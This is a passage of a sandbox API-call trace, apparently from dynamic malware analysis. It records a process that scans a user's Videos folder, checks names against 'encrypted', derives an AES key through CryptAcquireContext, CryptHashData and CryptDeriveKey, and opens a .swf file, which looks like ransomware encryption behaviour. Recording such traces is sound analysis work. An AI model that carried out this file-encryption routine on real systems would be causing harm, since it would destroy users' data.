lpString2="encrypted", cchCount2=9) returned 3 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.881] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.881] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0042.881] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.881] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.882] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.882] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.882] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.882] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.882] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.882] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54ff2c10, ftCreationTime.dwHighDateTime=0x1d5ba65, ftLastAccessTime.dwLowDateTime=0x834c3d80, ftLastAccessTime.dwHighDateTime=0x1d5c341, ftLastWriteTime.dwLowDateTime=0x834c3d80, ftLastWriteTime.dwHighDateTime=0x1d5c341, nFileSizeHigh=0x0, nFileSizeLow=0x35ac, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="8Y1tRpLFO1LPoJ0Q.swf", cAlternateFileName="8Y1TRP~1.SWF")) returned 0x7c2240 [0042.882] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0042.882] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.882] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.882] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.882] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.882] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0042.882] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.882] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0042.882] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.883] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.883] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0042.883] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.883] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.883] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.883] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.883] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.883] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0042.883] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.883] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0042.884] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.884] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.884] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0042.884] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.884] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.884] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.884] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.884] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.884] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.884] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.884] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.884] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.884] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.885] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.885] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.885] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0042.885] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.885] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.885] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.885] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.885] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.885] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.885] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.885] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.885] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.885] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.885] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.885] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.885] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.885] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.885] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.885] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.885] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.886] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.886] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.886] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0042.886] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.886] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.886] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.886] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.886] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0042.886] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.886] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.886] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.886] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.886] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.886] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0042.886] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.886] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.886] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.886] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.886] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.886] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.887] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.887] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.887] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0042.887] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.887] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.887] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.887] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.887] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.887] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.887] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0042.887] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.887] CryptDestroyHash (hHash=0x7c2100) returned 1 [0042.887] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.887] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.887] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.887] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.887] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.888] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\8y1trplfo1lpoj0q.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0042.888] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.888] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0042.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0042.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0042.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0042.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0042.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0042.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0042.888] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0042.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0042.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0042.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0042.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0042.888] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0042.888] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0042.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0042.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0042.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0042.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0042.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0042.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0042.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0042.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0042.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0042.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0042.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0042.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0042.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0042.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0042.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0042.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0042.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0042.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0042.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0042.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0042.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0042.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0042.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0042.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0042.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0042.890] 